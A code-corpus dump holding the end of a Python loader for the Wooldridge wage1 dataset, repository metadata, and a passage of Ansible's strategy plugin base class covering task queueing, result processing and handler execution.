- ndurman. =1 if in nondur. manuf. indus.
- trcommpu. =1 if in trans, commun, pub ut
- trade. =1 if in wholesale or retail
- services. =1 if in services indus.
- profserv. =1 if in prof. serv. indus.
- profocc. =1 if in profess. occupation
- clerocc. =1 if in clerical occupation
- servocc. =1 if in service occupation
- lwage. log(wage)
- expersq. exper^2
- tenursq. tenure^2
https://www.cengage.com/cgi-wadsworth/course_products_wp.pl?fid=M20b&product_
isbn_issn=9781111531041
Args:
path: str.
Path to directory which either stores file or otherwise file will
be downloaded and extracted there.
Filename is `wage1.csv`.
Returns:
Tuple of np.ndarray `x_train` with 526 rows and 24 columns and
dictionary `metadata` of column headers (feature names).
"""
import pandas as pd
path = os.path.expanduser(path)
filename = 'wage1.csv'
if not os.path.exists(os.path.join(path, filename)):
url = 'http://dustintran.com/data/r/wooldridge/wage1.csv'
maybe_download_and_extract(path, url,
save_file_name='wage1.csv',
resume=False)
data = pd.read_csv(os.path.join(path, filename), index_col=0,
parse_dates=True)
x_train = data.values
metadata = {'columns': data.columns}
return x_train, metadata
| 22.846939 | 77 | 0.669049 |
4a1e39bb30b04c3f1890319344b39508fb54a017 | 56,308 | py | Python | venv/lib/python2.7/site-packages/ansible/plugins/strategy/__init__.py | aburan28/ansible-devops-pipeline | 50aa801632ca0828c16faac55732f1e79085f932 | [
"Apache-2.0"
] | 1 | 2019-04-16T21:23:15.000Z | 2019-04-16T21:23:15.000Z | venv/lib/python2.7/site-packages/ansible/plugins/strategy/__init__.py | aburan28/ansible-devops-pipeline | 50aa801632ca0828c16faac55732f1e79085f932 | [
"Apache-2.0"
] | 5 | 2020-02-26T20:10:50.000Z | 2021-09-23T23:23:18.000Z | venv/lib/python2.7/site-packages/ansible/plugins/strategy/__init__.py | aburan28/ansible-devops-pipeline | 50aa801632ca0828c16faac55732f1e79085f932 | [
"Apache-2.0"
] | null | null | null | # (c) 2012-2014, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import cmd
import functools
import os
import pprint
import sys
import threading
import time
from collections import deque
from multiprocessing import Lock
from jinja2.exceptions import UndefinedError
from ansible import constants as C
from ansible.errors import AnsibleError, AnsibleParserError, AnsibleUndefinedVariable
from ansible.executor import action_write_locks
from ansible.executor.process.worker import WorkerProcess
from ansible.executor.task_result import TaskResult
from ansible.inventory.host import Host
from ansible.module_utils.six.moves import queue as Queue
from ansible.module_utils.six import iteritems, itervalues, string_types
from ansible.module_utils._text import to_text
from ansible.module_utils.connection import Connection, ConnectionError
from ansible.playbook.helpers import load_list_of_blocks
from ansible.playbook.included_file import IncludedFile
from ansible.playbook.task_include import TaskInclude
from ansible.playbook.role_include import IncludeRole
from ansible.plugins.loader import action_loader, connection_loader, filter_loader, lookup_loader, module_loader, test_loader
from ansible.template import Templar
from ansible.utils.vars import combine_vars
from ansible.vars.clean import strip_internal_keys
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
__all__ = ['StrategyBase']
class StrategySentinel:
pass
# TODO: this should probably be in the plugins/__init__.py, with
# a smarter mechanism to set all of the attributes based on
# the loaders created there
class SharedPluginLoaderObj:
'''
A simple object to make pass the various plugin loaders to
the forked processes over the queue easier
'''
def __init__(self):
self.action_loader = action_loader
self.connection_loader = connection_loader
self.filter_loader = filter_loader
self.test_loader = test_loader
self.lookup_loader = lookup_loader
self.module_loader = module_loader
_sentinel = StrategySentinel()
def results_thread_main(strategy):
while True:
try:
result = strategy._final_q.get()
if isinstance(result, StrategySentinel):
break
else:
strategy._results_lock.acquire()
strategy._results.append(result)
strategy._results_lock.release()
except (IOError, EOFError):
break
except Queue.Empty:
pass
def debug_closure(func):
"""Closure to wrap ``StrategyBase._process_pending_results`` and invoke the task debugger"""
@functools.wraps(func)
def inner(self, iterator, one_pass=False, max_passes=None):
status_to_stats_map = (
('is_failed', 'failures'),
('is_unreachable', 'dark'),
('is_changed', 'changed'),
('is_skipped', 'skipped'),
)
# We don't know the host yet, copy the previous states, for lookup after we process new results
prev_host_states = iterator._host_states.copy()
results = func(self, iterator, one_pass=one_pass, max_passes=max_passes)
_processed_results = []
for result in results:
task = result._task
host = result._host
_queued_task_args = self._queued_task_cache.pop((host.name, task._uuid), None)
task_vars = _queued_task_args['task_vars']
play_context = _queued_task_args['play_context']
# Try to grab the previous host state, if it doesn't exist use get_host_state to generate an empty state
try:
prev_host_state = prev_host_states[host.name]
except KeyError:
prev_host_state = iterator.get_host_state(host)
while result.needs_debugger(globally_enabled=self.debugger_active):
next_action = NextAction()
dbg = Debugger(task, host, task_vars, play_context, result, next_action)
dbg.cmdloop()
if next_action.result == NextAction.REDO:
# rollback host state
self._tqm.clear_failed_hosts()
iterator._host_states[host.name] = prev_host_state
for method, what in status_to_stats_map:
if getattr(result, method)():
self._tqm._stats.decrement(what, host.name)
self._tqm._stats.decrement('ok', host.name)
# redo
self._queue_task(host, task, task_vars, play_context)
_processed_results.extend(debug_closure(func)(self, iterator, one_pass))
break
elif next_action.result == NextAction.CONTINUE:
_processed_results.append(result)
break
elif next_action.result == NextAction.EXIT:
# Matches KeyboardInterrupt from bin/ansible
sys.exit(99)
else:
_processed_results.append(result)
return _processed_results
return inner
class StrategyBase:
'''
This is the base class for strategy plugins, which contains some common
code useful to all strategies like running handlers, cleanup actions, etc.
'''
def __init__(self, tqm):
self._tqm = tqm
self._inventory = tqm.get_inventory()
self._workers = tqm.get_workers()
self._notified_handlers = tqm._notified_handlers
self._listening_handlers = tqm._listening_handlers
self._variable_manager = tqm.get_variable_manager()
self._loader = tqm.get_loader()
self._final_q = tqm._final_q
self._step = getattr(tqm._options, 'step', False)
self._diff = getattr(tqm._options, 'diff', False)
self.flush_cache = getattr(tqm._options, 'flush_cache', False)
# the task cache is a dictionary of tuples of (host.name, task._uuid)
# used to find the original task object of in-flight tasks and to store
# the task args/vars and play context info used to queue the task.
self._queued_task_cache = {}
# Backwards compat: self._display isn't really needed, just import the global display and use that.
self._display = display
# internal counters
self._pending_results = 0
self._cur_worker = 0
# this dictionary is used to keep track of hosts that have
# outstanding tasks still in queue
self._blocked_hosts = dict()
# this dictionary is used to keep track of hosts that have
# flushed handlers
self._flushed_hosts = dict()
self._results = deque()
self._results_lock = threading.Condition(threading.Lock())
# create the result processing thread for reading results in the background
self._results_thread = threading.Thread(target=results_thread_main, args=(self,))
self._results_thread.daemon = True
self._results_thread.start()
# holds the list of active (persistent) connections to be shutdown at
# play completion
self._active_connections = dict()
self.debugger_active = C.ENABLE_TASK_DEBUGGER
def cleanup(self):
# close active persistent connections
for sock in itervalues(self._active_connections):
try:
conn = Connection(sock)
conn.reset()
except ConnectionError as e:
# most likely socket is already closed
display.debug("got an error while closing persistent connection: %s" % e)
self._final_q.put(_sentinel)
self._results_thread.join()
def run(self, iterator, play_context, result=0):
# execute one more pass through the iterator without peeking, to
# make sure that all of the hosts are advanced to their final task.
# This should be safe, as everything should be ITERATING_COMPLETE by
# this point, though the strategy may not advance the hosts itself.
[iterator.get_next_task_for_host(host) for host in self._inventory.get_hosts(iterator._play.hosts) if host.name not in self._tqm._unreachable_hosts]
# save the failed/unreachable hosts, as the run_handlers()
# method will clear that information during its execution
failed_hosts = iterator.get_failed_hosts()
unreachable_hosts = self._tqm._unreachable_hosts.keys()
display.debug("running handlers")
handler_result = self.run_handlers(iterator, play_context)
if isinstance(handler_result, bool) and not handler_result:
result |= self._tqm.RUN_ERROR
elif not handler_result:
result |= handler_result
# now update with the hosts (if any) that failed or were
# unreachable during the handler execution phase
failed_hosts = set(failed_hosts).union(iterator.get_failed_hosts())
unreachable_hosts = set(unreachable_hosts).union(self._tqm._unreachable_hosts.keys())
# return the appropriate code, depending on the status hosts after the run
if not isinstance(result, bool) and result != self._tqm.RUN_OK:
return result
elif len(unreachable_hosts) > 0:
return self._tqm.RUN_UNREACHABLE_HOSTS
elif len(failed_hosts) > 0:
return self._tqm.RUN_FAILED_HOSTS
else:
return self._tqm.RUN_OK
def get_hosts_remaining(self, play):
return [host for host in self._inventory.get_hosts(play.hosts)
if host.name not in self._tqm._failed_hosts and host.name not in self._tqm._unreachable_hosts]
def get_failed_hosts(self, play):
return [host for host in self._inventory.get_hosts(play.hosts) if host.name in self._tqm._failed_hosts]
def add_tqm_variables(self, vars, play):
'''
Base class method to add extra variables/information to the list of task
vars sent through the executor engine regarding the task queue manager state.
'''
vars['ansible_current_hosts'] = [h.name for h in self.get_hosts_remaining(play)]
vars['ansible_failed_hosts'] = [h.name for h in self.get_failed_hosts(play)]
def _queue_task(self, host, task, task_vars, play_context):
''' handles queueing the task up to be sent to a worker '''
display.debug("entering _queue_task() for %s/%s" % (host.name, task.action))
# Add a write lock for tasks.
# Maybe this should be added somewhere further up the call stack but
# this is the earliest in the code where we have task (1) extracted
# into its own variable and (2) there's only a single code path
# leading to the module being run. This is called by three
# functions: __init__.py::_do_handler_run(), linear.py::run(), and
# free.py::run() so we'd have to add to all three to do it there.
# The next common higher level is __init__.py::run() and that has
# tasks inside of play_iterator so we'd have to extract them to do it
# there.
if task.action not in action_write_locks.action_write_locks:
display.debug('Creating lock for %s' % task.action)
action_write_locks.action_write_locks[task.action] = Lock()
# and then queue the new task
try:
# create a dummy object with plugin loaders set as an easier
# way to share them with the forked processes
shared_loader_obj = SharedPluginLoaderObj()
queued = False
starting_worker = self._cur_worker
while True:
worker_prc = self._workers[self._cur_worker]
if worker_prc is None or not worker_prc.is_alive():
self._queued_task_cache[(host.name, task._uuid)] = {
'host': host,
'task': task,
'task_vars': task_vars,
'play_context': play_context
}
worker_prc = WorkerProcess(self._final_q, task_vars, host, task, play_context, self._loader, self._variable_manager, shared_loader_obj)
self._workers[self._cur_worker] = worker_prc
worker_prc.start()
display.debug("worker is %d (out of %d available)" % (self._cur_worker + 1, len(self._workers)))
queued = True
self._cur_worker += 1
if self._cur_worker >= len(self._workers):
self._cur_worker = 0
if queued:
break
elif self._cur_worker == starting_worker:
time.sleep(0.0001)
self._pending_results += 1
except (EOFError, IOError, AssertionError) as e:
# most likely an abort
display.debug("got an error while queuing: %s" % e)
return
display.debug("exiting _queue_task() for %s/%s" % (host.name, task.action))
def get_task_hosts(self, iterator, task_host, task):
if task.run_once:
host_list = [host for host in self._inventory.get_hosts(iterator._play.hosts) if host.name not in self._tqm._unreachable_hosts]
else:
host_list = [task_host]
return host_list
def get_delegated_hosts(self, result, task):
host_name = result.get('_ansible_delegated_vars', {}).get('ansible_delegated_host', None)
if host_name is not None:
actual_host = self._inventory.get_host(host_name)
if actual_host is None:
actual_host = Host(name=host_name)
else:
actual_host = Host(name=task.delegate_to)
return [actual_host]
@debug_closure
def _process_pending_results(self, iterator, one_pass=False, max_passes=None):
'''
Reads results off the final queue and takes appropriate action
based on the result (executing callbacks, updating state, etc.).
'''
ret_results = []
def get_original_host(host_name):
# FIXME: this should not need x2 _inventory
host_name = to_text(host_name)
if host_name in self._inventory.hosts:
return self._inventory.hosts[host_name]
else:
return self._inventory.get_host(host_name)
def search_handler_blocks_by_name(handler_name, handler_blocks):
for handler_block in handler_blocks:
for handler_task in handler_block.block:
if handler_task.name:
handler_vars = self._variable_manager.get_vars(play=iterator._play, task=handler_task)
templar = Templar(loader=self._loader, variables=handler_vars)
try:
# first we check with the full result of get_name(), which may
# include the role name (if the handler is from a role). If that
# is not found, we resort to the simple name field, which doesn't
# have anything extra added to it.
target_handler_name = templar.template(handler_task.name)
if target_handler_name == handler_name:
return handler_task
else:
target_handler_name = templar.template(handler_task.get_name())
if target_handler_name == handler_name:
return handler_task
except (UndefinedError, AnsibleUndefinedVariable):
# We skip this handler due to the fact that it may be using
# a variable in the name that was conditionally included via
# set_fact or some other method, and we don't want to error
# out unnecessarily
continue
return None
def search_handler_blocks_by_uuid(handler_uuid, handler_blocks):
for handler_block in handler_blocks:
for handler_task in handler_block.block:
if handler_uuid == handler_task._uuid:
return handler_task
return None
def parent_handler_match(target_handler, handler_name):
if target_handler:
if isinstance(target_handler, (TaskInclude, IncludeRole)):
try:
handler_vars = self._variable_manager.get_vars(play=iterator._play, task=target_handler)
templar = Templar(loader=self._loader, variables=handler_vars)
target_handler_name = templar.template(target_handler.name)
if target_handler_name == handler_name:
return True
else:
target_handler_name = templar.template(target_handler.get_name())
if target_handler_name == handler_name:
return True
except (UndefinedError, AnsibleUndefinedVariable):
pass
return parent_handler_match(target_handler._parent, handler_name)
else:
return False
cur_pass = 0
while True:
try:
self._results_lock.acquire()
task_result = self._results.popleft()
except IndexError:
break
finally:
self._results_lock.release()
# get the original host and task. We then assign them to the TaskResult for use in callbacks/etc.
original_host = get_original_host(task_result._host)
queue_cache_entry = (original_host.name, task_result._task)
found_task = self._queued_task_cache.get(queue_cache_entry)['task']
original_task = found_task.copy(exclude_parent=True, exclude_tasks=True)
original_task._parent = found_task._parent
original_task.from_attrs(task_result._task_fields)
task_result._host = original_host
task_result._task = original_task
# send callbacks for 'non final' results
if '_ansible_retry' in task_result._result:
self._tqm.send_callback('v2_runner_retry', task_result)
continue
elif '_ansible_item_result' in task_result._result:
if task_result.is_failed() or task_result.is_unreachable():
self._tqm.send_callback('v2_runner_item_on_failed', task_result)
elif task_result.is_skipped():
self._tqm.send_callback('v2_runner_item_on_skipped', task_result)
else:
if 'diff' in task_result._result:
if self._diff or getattr(original_task, 'diff', False):
self._tqm.send_callback('v2_on_file_diff', task_result)
self._tqm.send_callback('v2_runner_item_on_ok', task_result)
continue
if original_task.register:
host_list = self.get_task_hosts(iterator, original_host, original_task)
clean_copy = strip_internal_keys(task_result._result)
if 'invocation' in clean_copy:
del clean_copy['invocation']
for target_host in host_list:
self._variable_manager.set_nonpersistent_facts(target_host, {original_task.register: clean_copy})
# all host status messages contain 2 entries: (msg, task_result)
role_ran = False
if task_result.is_failed():
role_ran = True
ignore_errors = original_task.ignore_errors
if not ignore_errors:
display.debug("marking %s as failed" % original_host.name)
if original_task.run_once:
# if we're using run_once, we have to fail every host here
for h in self._inventory.get_hosts(iterator._play.hosts):
if h.name not in self._tqm._unreachable_hosts:
state, _ = iterator.get_next_task_for_host(h, peek=True)
iterator.mark_host_failed(h)
state, new_task = iterator.get_next_task_for_host(h, peek=True)
else:
iterator.mark_host_failed(original_host)
# increment the failed count for this host
self._tqm._stats.increment('failures', original_host.name)
# grab the current state and if we're iterating on the rescue portion
# of a block then we save the failed task in a special var for use
# within the rescue/always
state, _ = iterator.get_next_task_for_host(original_host, peek=True)
if iterator.is_failed(original_host) and state and state.run_state == iterator.ITERATING_COMPLETE:
self._tqm._failed_hosts[original_host.name] = True
if state and iterator.get_active_state(state).run_state == iterator.ITERATING_RESCUE:
self._variable_manager.set_nonpersistent_facts(
original_host,
dict(
ansible_failed_task=original_task.serialize(),
ansible_failed_result=task_result._result,
),
)
else:
self._tqm._stats.increment('ok', original_host.name)
if 'changed' in task_result._result and task_result._result['changed']:
self._tqm._stats.increment('changed', original_host.name)
self._tqm.send_callback('v2_runner_on_failed', task_result, ignore_errors=ignore_errors)
elif task_result.is_unreachable():
ignore_unreachable = original_task.ignore_unreachable
if not ignore_unreachable:
self._tqm._unreachable_hosts[original_host.name] = True
iterator._play._removed_hosts.append(original_host.name)
else:
self._tqm._stats.increment('skipped', original_host.name)
task_result._result['skip_reason'] = 'Host %s is unreachable' % original_host.name
self._tqm._stats.increment('dark', original_host.name)
self._tqm.send_callback('v2_runner_on_unreachable', task_result)
elif task_result.is_skipped():
self._tqm._stats.increment('skipped', original_host.name)
self._tqm.send_callback('v2_runner_on_skipped', task_result)
else:
role_ran = True
if original_task.loop:
# this task had a loop, and has more than one result, so
# loop over all of them instead of a single result
result_items = task_result._result.get('results', [])
else:
result_items = [task_result._result]
for result_item in result_items:
if '_ansible_notify' in result_item:
if task_result.is_changed():
# The shared dictionary for notified handlers is a proxy, which
# does not detect when sub-objects within the proxy are modified.
# So, per the docs, we reassign the list so the proxy picks up and
# notifies all other threads
for handler_name in result_item['_ansible_notify']:
found = False
# Find the handler using the above helper. First we look up the
# dependency chain of the current task (if it's from a role), otherwise
# we just look through the list of handlers in the current play/all
# roles and use the first one that matches the notify name
target_handler = search_handler_blocks_by_name(handler_name, iterator._play.handlers)
if target_handler is not None:
found = True
if target_handler._uuid not in self._notified_handlers:
self._notified_handlers[target_handler._uuid] = []
if original_host not in self._notified_handlers[target_handler._uuid]:
self._notified_handlers[target_handler._uuid].append(original_host)
self._tqm.send_callback('v2_playbook_on_notify', target_handler, original_host)
else:
# As there may be more than one handler with the notified name as the
# parent, so we just keep track of whether or not we found one at all
for target_handler_uuid in self._notified_handlers:
target_handler = search_handler_blocks_by_uuid(target_handler_uuid, iterator._play.handlers)
if target_handler and parent_handler_match(target_handler, handler_name):
found = True
if original_host not in self._notified_handlers[target_handler._uuid]:
self._notified_handlers[target_handler._uuid].append(original_host)
self._tqm.send_callback('v2_playbook_on_notify', target_handler, original_host)
if handler_name in self._listening_handlers:
for listening_handler_uuid in self._listening_handlers[handler_name]:
listening_handler = search_handler_blocks_by_uuid(listening_handler_uuid, iterator._play.handlers)
if listening_handler is not None:
found = True
else:
continue
if original_host not in self._notified_handlers[listening_handler._uuid]:
self._notified_handlers[listening_handler._uuid].append(original_host)
self._tqm.send_callback('v2_playbook_on_notify', listening_handler, original_host)
# and if none were found, then we raise an error
if not found:
msg = ("The requested handler '%s' was not found in either the main handlers list nor in the listening "
"handlers list" % handler_name)
if C.ERROR_ON_MISSING_HANDLER:
raise AnsibleError(msg)
else:
display.warning(msg)
if 'add_host' in result_item:
# this task added a new host (add_host module)
new_host_info = result_item.get('add_host', dict())
self._add_host(new_host_info, iterator)
elif 'add_group' in result_item:
# this task added a new group (group_by module)
self._add_group(original_host, result_item)
if 'ansible_facts' in result_item:
# if delegated fact and we are delegating facts, we need to change target host for them
if original_task.delegate_to is not None and original_task.delegate_facts:
host_list = self.get_delegated_hosts(result_item, original_task)
else:
host_list = self.get_task_hosts(iterator, original_host, original_task)
if original_task.action == 'include_vars':
for (var_name, var_value) in iteritems(result_item['ansible_facts']):
# find the host we're actually referring too here, which may
# be a host that is not really in inventory at all
for target_host in host_list:
self._variable_manager.set_host_variable(target_host, var_name, var_value)
else:
cacheable = result_item.pop('_ansible_facts_cacheable', False)
for target_host in host_list:
if not original_task.action == 'set_fact' or cacheable:
self._variable_manager.set_host_facts(target_host, result_item['ansible_facts'].copy())
if original_task.action == 'set_fact':
self._variable_manager.set_nonpersistent_facts(target_host, result_item['ansible_facts'].copy())
if 'ansible_stats' in result_item and 'data' in result_item['ansible_stats'] and result_item['ansible_stats']['data']:
if 'per_host' not in result_item['ansible_stats'] or result_item['ansible_stats']['per_host']:
host_list = self.get_task_hosts(iterator, original_host, original_task)
else:
host_list = [None]
data = result_item['ansible_stats']['data']
aggregate = 'aggregate' in result_item['ansible_stats'] and result_item['ansible_stats']['aggregate']
for myhost in host_list:
for k in data.keys():
if aggregate:
self._tqm._stats.update_custom_stats(k, data[k], myhost)
else:
self._tqm._stats.set_custom_stats(k, data[k], myhost)
if 'diff' in task_result._result:
if self._diff or getattr(original_task, 'diff', False):
self._tqm.send_callback('v2_on_file_diff', task_result)
if not isinstance(original_task, TaskInclude):
self._tqm._stats.increment('ok', original_host.name)
if 'changed' in task_result._result and task_result._result['changed']:
self._tqm._stats.increment('changed', original_host.name)
# finally, send the ok for this task
self._tqm.send_callback('v2_runner_on_ok', task_result)
self._pending_results -= 1
if original_host.name in self._blocked_hosts:
del self._blocked_hosts[original_host.name]
# If this is a role task, mark the parent role as being run (if
# the task was ok or failed, but not skipped or unreachable)
if original_task._role is not None and role_ran: # TODO: and original_task.action != 'include_role':?
# lookup the role in the ROLE_CACHE to make sure we're dealing
# with the correct object and mark it as executed
for (entry, role_obj) in iteritems(iterator._play.ROLE_CACHE[original_task._role._role_name]):
if role_obj._uuid == original_task._role._uuid:
role_obj._had_task_run[original_host.name] = True
ret_results.append(task_result)
if one_pass or max_passes is not None and (cur_pass + 1) >= max_passes:
break
cur_pass += 1
return ret_results
def _wait_on_handler_results(self, iterator, handler, notified_hosts):
'''
Wait for the handler tasks to complete, using a short sleep
between checks to ensure we don't spin lock
'''
ret_results = []
handler_results = 0
display.debug("waiting for handler results...")
while (self._pending_results > 0 and
handler_results < len(notified_hosts) and
not self._tqm._terminated):
if self._tqm.has_dead_workers():
raise AnsibleError("A worker was found in a dead state")
results = self._process_pending_results(iterator)
ret_results.extend(results)
handler_results += len([
r._host for r in results if r._host in notified_hosts and
r.task_name == handler.name])
if self._pending_results > 0:
time.sleep(C.DEFAULT_INTERNAL_POLL_INTERVAL)
display.debug("no more pending handlers, returning what we have")
return ret_results
def _wait_on_pending_results(self, iterator):
'''
Wait for the shared counter to drop to zero, using a short sleep
between checks to ensure we don't spin lock
'''
ret_results = []
display.debug("waiting for pending results...")
while self._pending_results > 0 and not self._tqm._terminated:
if self._tqm.has_dead_workers():
raise AnsibleError("A worker was found in a dead state")
results = self._process_pending_results(iterator)
ret_results.extend(results)
if self._pending_results > 0:
time.sleep(C.DEFAULT_INTERNAL_POLL_INTERVAL)
display.debug("no more pending results, returning what we have")
return ret_results
def _add_host(self, host_info, iterator):
'''
Helper function to add a new host to inventory based on a task result.
'''
if host_info:
host_name = host_info.get('host_name')
# Check if host in inventory, add if not
if host_name not in self._inventory.hosts:
self._inventory.add_host(host_name, 'all')
new_host = self._inventory.hosts.get(host_name)
# Set/update the vars for this host
new_host.vars = combine_vars(new_host.get_vars(), host_info.get('host_vars', dict()))
new_groups = host_info.get('groups', [])
for group_name in new_groups:
if group_name not in self._inventory.groups:
self._inventory.add_group(group_name)
new_group = self._inventory.groups[group_name]
new_group.add_host(self._inventory.hosts[host_name])
# reconcile inventory, ensures inventory rules are followed
self._inventory.reconcile_inventory()
def _add_group(self, host, result_item):
'''
Helper function to add a group (if it does not exist), and to assign the
specified host to that group.
'''
changed = False
# the host here is from the executor side, which means it was a
# serialized/cloned copy and we'll need to look up the proper
# host object from the master inventory
real_host = self._inventory.hosts.get(host.name)
if real_host is None:
if host.name == self._inventory.localhost.name:
real_host = self._inventory.localhost
else:
raise AnsibleError('%s cannot be matched in inventory' % host.name)
group_name = result_item.get('add_group')
parent_group_names = result_item.get('parent_groups', [])
for name in [group_name] + parent_group_names:
if name not in self._inventory.groups:
# create the new group and add it to inventory
self._inventory.add_group(name)
changed = True
group = self._inventory.groups[group_name]
for parent_group_name in parent_group_names:
parent_group = self._inventory.groups[parent_group_name]
parent_group.add_child_group(group)
if real_host.name not in group.get_hosts():
group.add_host(real_host)
changed = True
if group_name not in host.get_groups():
real_host.add_group(group)
changed = True
if changed:
self._inventory.reconcile_inventory()
return changed
def _copy_included_file(self, included_file):
'''
A proven safe and performant way to create a copy of an included file
'''
ti_copy = included_file._task.copy(exclude_parent=True)
ti_copy._parent = included_file._task._parent
temp_vars = ti_copy.vars.copy()
temp_vars.update(included_file._args)
ti_copy.vars = temp_vars
return ti_copy
def _load_included_file(self, included_file, iterator, is_handler=False):
'''
Loads an included YAML file of tasks, applying the optional set of variables.
'''
display.debug("loading included file: %s" % included_file._filename)
try:
data = self._loader.load_from_file(included_file._filename)
if data is None:
return []
elif not isinstance(data, list):
raise AnsibleError("included task files must contain a list of tasks")
ti_copy = self._copy_included_file(included_file)
# pop tags out of the include args, if they were specified there, and assign
# them to the include. If the include already had tags specified, we raise an
# error so that users know not to specify them both ways
tags = included_file._task.vars.pop('tags', [])
if isinstance(tags, string_types):
tags = tags.split(',')
if len(tags) > 0:
if len(included_file._task.tags) > 0:
raise AnsibleParserError("Include tasks should not specify tags in more than one way (both via args and directly on the task). "
"Mixing tag specify styles is prohibited for whole import hierarchy, not only for single import statement",
obj=included_file._task._ds)
display.deprecated("You should not specify tags in the include parameters. All tags should be specified using the task-level option",
version='2.12')
included_file._task.tags = tags
block_list = load_list_of_blocks(
data,
play=iterator._play,
parent_block=ti_copy.build_parent_block(),
role=included_file._task._role,
use_handlers=is_handler,
loader=self._loader,
variable_manager=self._variable_manager,
)
# since we skip incrementing the stats when the task result is
# first processed, we do so now for each host in the list
for host in included_file._hosts:
self._tqm._stats.increment('ok', host.name)
except AnsibleError as e:
# mark all of the hosts including this file as failed, send callbacks,
# and increment the stats for this host
for host in included_file._hosts:
tr = TaskResult(host=host, task=included_file._task, return_data=dict(failed=True, reason=to_text(e)))
iterator.mark_host_failed(host)
self._tqm._failed_hosts[host.name] = True
self._tqm._stats.increment('failures', host.name)
self._tqm.send_callback('v2_runner_on_failed', tr)
return []
# finally, send the callback and return the list of blocks loaded
self._tqm.send_callback('v2_playbook_on_include', included_file)
display.debug("done processing included file")
return block_list
def run_handlers(self, iterator, play_context):
'''
Runs handlers on those hosts which have been notified.
'''
result = self._tqm.RUN_OK
for handler_block in iterator._play.handlers:
# FIXME: handlers need to support the rescue/always portions of blocks too,
# but this may take some work in the iterator and gets tricky when
# we consider the ability of meta tasks to flush handlers
for handler in handler_block.block:
if handler._uuid in self._notified_handlers and len(self._notified_handlers[handler._uuid]):
handler_vars = self._variable_manager.get_vars(play=iterator._play, task=handler)
templar = Templar(loader=self._loader, variables=handler_vars)
handler_name = handler.get_name()
try:
handler_name = templar.template(handler_name)
except (UndefinedError, AnsibleUndefinedVariable):
pass
result = self._do_handler_run(handler, handler_name, iterator=iterator, play_context=play_context)
if not result:
break
return result
def _do_handler_run(self, handler, handler_name, iterator, play_context, notified_hosts=None):
# FIXME: need to use iterator.get_failed_hosts() instead?
# if not len(self.get_hosts_remaining(iterator._play)):
# self._tqm.send_callback('v2_playbook_on_no_hosts_remaining')
# result = False
# break
if notified_hosts is None:
notified_hosts = self._notified_handlers[handler._uuid]
notified_hosts = self._filter_notified_hosts(notified_hosts)
if len(notified_hosts) > 0:
saved_name = handler.name
handler.name = handler_name
self._tqm.send_callback('v2_playbook_on_handler_task_start', handler)
handler.name = saved_name
run_once = False
try:
action = action_loader.get(handler.action, class_only=True)
if handler.run_once or getattr(action, 'BYPASS_HOST_LOOP', False):
run_once = True
except KeyError:
# we don't care here, because the action may simply not have a
# corresponding action plugin
pass
host_results = []
for host in notified_hosts:
if not handler.has_triggered(host) and (not iterator.is_failed(host) or play_context.force_handlers):
task_vars = self._variable_manager.get_vars(play=iterator._play, host=host, task=handler)
self.add_tqm_variables(task_vars, play=iterator._play)
self._queue_task(host, handler, task_vars, play_context)
if run_once:
break
# collect the results from the handler run
host_results = self._wait_on_handler_results(iterator, handler, notified_hosts)
try:
included_files = IncludedFile.process_include_results(
host_results,
iterator=iterator,
loader=self._loader,
variable_manager=self._variable_manager
)
except AnsibleError as e:
return False
result = True
if len(included_files) > 0:
for included_file in included_files:
try:
new_blocks = self._load_included_file(included_file, iterator=iterator, is_handler=True)
# for every task in each block brought in by the include, add the list
# of hosts which included the file to the notified_handlers dict
for block in new_blocks:
iterator._play.handlers.append(block)
iterator.cache_block_tasks(block)
for task in block.block:
task_name = task.get_name()
display.debug("adding task '%s' included in handler '%s'" % (task_name, handler_name))
self._notified_handlers[task._uuid] = included_file._hosts[:]
result = self._do_handler_run(
handler=task,
handler_name=task_name,
iterator=iterator,
play_context=play_context,
notified_hosts=included_file._hosts[:],
)
if not result:
break
except AnsibleError as e:
for host in included_file._hosts:
iterator.mark_host_failed(host)
self._tqm._failed_hosts[host.name] = True
display.warning(str(e))
continue
# remove hosts from notification list
self._notified_handlers[handler._uuid] = [
h for h in self._notified_handlers[handler._uuid]
if h not in notified_hosts]
display.debug("done running handlers, result is: %s" % result)
return result
def _filter_notified_hosts(self, notified_hosts):
'''
Filter notified hosts accordingly to strategy
'''
# As main strategy is linear, we do not filter hosts
# We return a copy to avoid race conditions
return notified_hosts[:]
def _take_step(self, task, host=None):
ret = False
msg = u'Perform task: %s ' % task
if host:
msg += u'on %s ' % host
msg += u'(N)o/(y)es/(c)ontinue: '
resp = display.prompt(msg)
if resp.lower() in ['y', 'yes']:
display.debug("User ran task")
ret = True
elif resp.lower() in ['c', 'continue']:
display.debug("User ran task and canceled step mode")
self._step = False
ret = True
else:
display.debug("User skipped task")
display.banner(msg)
return ret
def _cond_not_supported_warn(self, task_name):
display.warning("%s task does not support when conditional" % task_name)
def _execute_meta(self, task, play_context, iterator, target_host):
# meta tasks store their args in the _raw_params field of args,
# since they do not use k=v pairs, so get that
meta_action = task.args.get('_raw_params')
def _evaluate_conditional(h):
all_vars = self._variable_manager.get_vars(play=iterator._play, host=h, task=task)
templar = Templar(loader=self._loader, variables=all_vars)
return task.evaluate_conditional(templar, all_vars)
skipped = False
msg = ''
if meta_action == 'noop':
# FIXME: issue a callback for the noop here?
if task.when:
self._cond_not_supported_warn(meta_action)
msg = "noop"
elif meta_action == 'flush_handlers':
if task.when:
self._cond_not_supported_warn(meta_action)
self._flushed_hosts[target_host] = True
self.run_handlers(iterator, play_context)
self._flushed_hosts[target_host] = False
msg = "ran handlers"
elif meta_action == 'refresh_inventory' or self.flush_cache:
if task.when:
self._cond_not_supported_warn(meta_action)
self._inventory.refresh_inventory()
msg = "inventory successfully refreshed"
elif meta_action == 'clear_facts':
if _evaluate_conditional(target_host):
for host in self._inventory.get_hosts(iterator._play.hosts):
hostname = host.get_name()
self._variable_manager.clear_facts(hostname)
msg = "facts cleared"
else:
skipped = True
